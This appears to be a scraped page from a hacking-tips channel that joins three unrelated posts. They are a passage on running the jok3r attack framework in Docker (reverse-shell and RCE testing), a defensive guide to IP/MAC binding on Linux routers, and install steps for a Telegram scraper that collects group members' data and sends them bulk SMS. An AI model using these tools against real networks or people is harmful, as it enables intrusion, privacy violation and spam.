-e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix is required in order to be able to start GUI applicationfrom the Docker container (e.g. open web browser to read reports). It requires running xhost +local:root on the host.
--shm-size 2g is used to increase the size of the shared memory, it is required to avoid crashs of web browser when reading reports from the Docker container.
--net=host is required to share host's interface. It is needed for reverse connections (e.g. Ping to container when testing for RCE, Getting a reverse shell)

2) To re-run a stopped container:

sudo docker start -i jok3r-container

3) To open multiple shells inside the container:

sudo docker exec -it jok3r-container bash

πŸ¦‘COMMANDS :
python3 jok3r.py toolbox --show-all
Install all the tools in the toolbox (already done in Docker container):
python3 jok3r.py toolbox --install-all --auto
Update all the tools in the toolbox and prompt each time to check update:
python3 jok3r.py toolbox --update-all
Update all the tools in the toolbox without any prompt:
python3 jok3r.py toolbox --update-all --auto
Information
List supported services:
python3 jok3r.py info --services
Show security checks for a given service:
python3 jok3r.py info --checks <service>
Show supported attack profiles for a given service:
python3 jok3r.py info --attack-profiles <service>
Show supported products for all services:
python3 jok3r.py info --products

πŸ¦‘Tested by Undercode
enjoy

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Network filtering-set up IP and MAC binding on Linux routing by undercode :
instagram.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

There are such requirements in some systems. IP addresses are connected to the Internet, and hope that these
IP addresses are not stolen by illegal users. This can be achieved by the following solutions:

1) First use ipchains or iptables to set only allow legitimate IP addresses to connect.
Establish IP / MAC bundling for legitimate IP. To discuss this issue, we first need to understand the working principle of the
ARP protocol . The ARP protocol is the abbreviation of the Address Resolution Protocol. Its function and working principle are as follows:
In the underlying network communication, two nodes want to communicate with each other. You must first know the MAC addresses of the source and destination. In order

2) to allow the system to quickly find the MAC address of a remote node, each local kernel maintains an immediate
lookup table (called ARP cache). ARP contains a list that maps the IP address of the remote host to its corresponding MAC address. The
Address Resolution Protocol (ARP) cache is a data structure that is resident in memory, and its contents are managed
and maintained by the kernel of the local system .

3) By default, the IP
address (and corresponding MAC address) of the node that the local system communicates with in the last ten minutes is retained in the ARP cache .

4) When the MAC address of a remote host exists in the ARP cache of the local host, there is no problem in converting the IP address of the remote node to the MAC
address. However, in many cases, the MAC address of the remote host does not exist in the local ARP cache,

5) What will the system do? When the IP address of a remote host is known, but the MAC address is not in the local ARP cache
, the following process is used to obtain the MAC address of the remote node: the

6) local host sends a broadcast packet to all nodes in the network, asking if There is a corresponding IP address. A node
(only one) will answer this ARP broadcast message. The MAC
address of the remote host will be included in the response packet . After receiving this return packet, the local node will record the MAC address of the remote node in the local ARP cache.

7) If we IP / MAC correspondence between the establishment of a fixed, that is, to establish a static MAC to those legitimate IP address of
the time should be the relationship, even if illegal users from stealing the IP address, connection linux router in response to these IP requests made

8) not Will query its MAC address through the ARP protocol, but use the static MAC address established by linux to send out the response data. In this way,

9) IP thieves will not get the response data, so they can not use network services.

10) The method of establishing static IP / MAC binding is to create / etc / ethers file, which contains the correct IP / MAC correspondence
, the format is as follows:
192.168.2.32 08: 00: 4E: B0: 24: 47
and then in / etc / The last addition of rc.d / rc.local:
arp -f
can be

11) The iptables of 2.4 kernel can limit IP and MAC at the same time, use this function to limit the
IP address and MAC address at the same time to the rules of legal IP .

---
end
?
WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 updated telegram group scraper tool. fetch all information about group members
fb.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) pkg install -y git python

2) $ git clone https://github.com/th3unkn0n/TeleGram-Scraper.git

3) $ cd TeleGram-Scraper

πŸ¦‘ Install requierments

1) $ python3 setup.py -i

2) setup configration file ( apiID, apiHASH )
$ python3 setup.py -c

πŸ¦‘ To Genrate User Data

1) $ python3 scraper.py

( members.csv is default if you changed name use it )

2) Send Bulk sms To Collected Data
$ python3 smsbot.py members.csv

3) Update Tool
$ python3 setup.py -u

πŸ¦‘Tested by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁